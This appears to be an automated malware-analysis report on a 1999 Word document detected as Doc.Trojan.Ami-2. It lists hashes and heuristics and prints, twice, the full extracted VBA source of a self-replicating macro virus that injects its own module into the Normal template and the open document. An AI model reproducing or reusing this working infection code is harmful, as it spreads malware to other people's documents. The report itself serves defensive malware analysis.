Office (OLE) malware analysis — malicious · a48850a973cbcedd

MALICIOUS

Office (OLE)

35.0 KB Created: 1999-05-14 12:32:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: e40b8299aa1e2ffe194870863a987822 SHA-1: 2c4d8c627e910e1427aeffa3479118f39762a09d SHA-256: a48850a973cbcedd555ba92362b9dc76475c71063143cc33e04b7471a4e5ef0b

100 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The file is identified as malicious by ClamAV and contains legacy WordBasic and VBA macros. The 'Add_Modul_Infection' subroutine within the 'A_M_I' module appears to copy its own code into the Normal template and the active document, suggesting an attempt to establish persistence or facilitate further execution. The specific intent of the injected code is not fully discernible due to truncation, but the mechanism points towards a downloader or persistence malware.

Heuristics 3

ClamAV: Doc.Trojan.Ami-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Ami-2
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11205 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11205 bytes
SHA-256: `551ce148d2de8b54d09688333ef4162aeb9978f481366e48c2acc7021fd9b412`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub t() For I = 1 To ActiveDocument.VBProject.VBComponents.Count MsgBox ActiveDocument.VBProject.VBComponents(I).Name Next End Sub Attribute VB_Name = "A_M_I" Public Normal_ As Object, Active_ As Object Sub Add_Modul_Infection() On Error Resume Next Set Normal_ = NormalTemplate.VBProject Set Active_ = ActiveDocument.VBProject Const ModulName_ = "A_M_I" NormalIns_ = False ActiveIns_ = False CheckRefNormal_ CheckRefActive_ NormalComp_ = Normal_.VBComponents.Count ActiveComp_ = Active_.VBComponents.Count For x = 1 To NormalComp_ If Normal_.VBComponents(x).Name = ModulName_ Then _ NormalIns_ = True Next For y = 1 To ActiveComp_ If Active_.VBComponents(y).Name = ModulName_ Then _ ActiveIns_ = True Next If NormalIns_ = False Then VirusLength_ = Active_.VBComponents(ModulName_) _ .CodeModule.CountOfLines VirusCode_ = Active_.VBComponents(ModulName_) _ .CodeModule.Lines(1, VirusLength_) Normal_.VBComponents.Add (vbext_ct_StdModule) Normal_.VBComponents((NormalComp_ + 1)).Name = ModulName_ Normal_.VBComponents(ModulName_).CodeModule.AddFromString VirusCode_ End If If ActiveIns_ = False Then VirusLength_ = Normal_.VBComponents(ModulName_) _ .CodeModule.CountOfLines VirusCode_ = Normal_.VBComponents(ModulName_) _ .CodeModule.Lines(1, VirusLength_) Active_.VBComponents.Add (vbext_ct_StdModule) Active_.VBComponents((ActiveComp_ + 1)).Name = ModulName_ Active_.VBComponents(ModulName_).CodeModule.AddFromString VirusCode_ End If End Sub Function CheckRefNormal_() CheckRefNormal_ = False For I = 1 To Normal_.References.Count If Normal_.References(I).Name = "VBIDE" Then CheckRefNormal_ = True Next If CheckRefNormal_ = False Then Normal_.References _ .AddFromGuid "{0002E157-0000-0000-C000-000000000046}", 1, 0 End If End Function Function CheckRefActive_() CheckRefActive_ = False For I = 1 To Active_.References.Count If Active_.References(I).Name = "VBIDE" Then CheckRefActive_ = True Next If CheckRefActive_ = False Then Active_.References _ .AddFromGuid "{0002E157-0000-0000-C000-000000000046}", 1, 0 End If End Function ' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ' Jack Twoflower presents: AddModulInfection ' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ' This is a new technic to infect moduls ' without import/export. ' The code to add the 'VBIDE' library was ' very hard work, cause I didn't find any ' information in books, so I tried and ' tried. How you see, I had success! ;) ' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ' I like to thank to following ppl: ' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ' ~~+ LineZerØ Network (sorry, but you will ' stand strong with- ' out me ;( ) ' ~~+ Clau[UC] for helping me in irc and ' testing this here. ;) ' ~~+ VicodinES for being to greatest! ' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 'Thnx a lot 'Jack Twoflower ' Processing file: /opt/analyzer/scan_staging/285e56bd213d4e16971bc1d7db6ed547.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 1800 bytes ' Line #0: ' FuncDefn (Sub t()) ' Line #1: ' Line #2: ' StartForVariable ' Ld I ' EndForVariable ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' MemLd Count ' For ' Line #3: ' Ld I ' Ld ActiveDocument ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd New ' ArgsCall MsgBox 0x0001 ' Line #4: ' StartForVariable ' Next ' Line #5: ... (truncated)

SHA-256: 551ce148d2de8b54d09688333ef4162aeb9978f481366e48c2acc7021fd9b412

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub t()

For I = 1 To ActiveDocument.VBProject.VBComponents.Count
    MsgBox ActiveDocument.VBProject.VBComponents(I).Name
Next
End Sub


Attribute VB_Name = "A_M_I"
Public Normal_ As Object, Active_ As Object

Sub Add_Modul_Infection()
On Error Resume Next

Set Normal_ = NormalTemplate.VBProject
Set Active_ = ActiveDocument.VBProject

Const ModulName_ = "A_M_I"

NormalIns_ = False
ActiveIns_ = False

CheckRefNormal_
CheckRefActive_

NormalComp_ = Normal_.VBComponents.Count
ActiveComp_ = Active_.VBComponents.Count


For x = 1 To NormalComp_
    If Normal_.VBComponents(x).Name = ModulName_ Then _
    NormalIns_ = True
Next

For y = 1 To ActiveComp_
    If Active_.VBComponents(y).Name = ModulName_ Then _
    ActiveIns_ = True
Next


If NormalIns_ = False Then
  
    VirusLength_ = Active_.VBComponents(ModulName_) _
                    .CodeModule.CountOfLines
    VirusCode_ = Active_.VBComponents(ModulName_) _
                    .CodeModule.Lines(1, VirusLength_)
 
    Normal_.VBComponents.Add (vbext_ct_StdModule)
    Normal_.VBComponents((NormalComp_ + 1)).Name = ModulName_
    Normal_.VBComponents(ModulName_).CodeModule.AddFromString VirusCode_
        
End If

If ActiveIns_ = False Then

    VirusLength_ = Normal_.VBComponents(ModulName_) _
                    .CodeModule.CountOfLines
    VirusCode_ = Normal_.VBComponents(ModulName_) _
                    .CodeModule.Lines(1, VirusLength_)
    
    Active_.VBComponents.Add (vbext_ct_StdModule)
    Active_.VBComponents((ActiveComp_ + 1)).Name = ModulName_
    Active_.VBComponents(ModulName_).CodeModule.AddFromString VirusCode_

End If

End Sub

Function CheckRefNormal_()
CheckRefNormal_ = False

For I = 1 To Normal_.References.Count
    If Normal_.References(I).Name = "VBIDE" Then CheckRefNormal_ = True
Next

If CheckRefNormal_ = False Then
    Normal_.References _
     .AddFromGuid "{0002E157-0000-0000-C000-000000000046}", 1, 0
End If

End Function

Function CheckRefActive_()
CheckRefActive_ = False

For I = 1 To Active_.References.Count
    If Active_.References(I).Name = "VBIDE" Then CheckRefActive_ = True
Next

If CheckRefActive_ = False Then
    Active_.References _
     .AddFromGuid "{0002E157-0000-0000-C000-000000000046}", 1, 0
End If

End Function

' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'  Jack Twoflower presents: AddModulInfection
' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

'  This is a new technic to infect moduls
'  without import/export.

'  The code to add the 'VBIDE' library was
'  very hard work, cause I didn't find any
'  information in books, so I tried and
'  tried. How you see, I had success! ;)

' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'  I like to thank to following ppl:
' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   
'  ~~+ LineZerØ Network (sorry, but you will
'                        stand strong with-
'                        out me ;( )

'  ~~+ Clau[UC] for helping me in irc and
'               testing this here. ;)

'  ~~+ VicodinES for being to greatest!
                
' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

'Thnx a lot
'Jack Twoflower


' Processing file: /opt/analyzer/scan_staging/285e56bd213d4e16971bc1d7db6ed547.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1800 bytes
' Line #0:
' 	FuncDefn (Sub t())
' Line #1:
' Line #2:
' 	StartForVariable 
' 	Ld I 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #3:
' 	Ld I 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	ArgsCall MsgBox 0x0001 
' Line #4:
' 	StartForVariable 
' 	Next 
' Line #5:

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.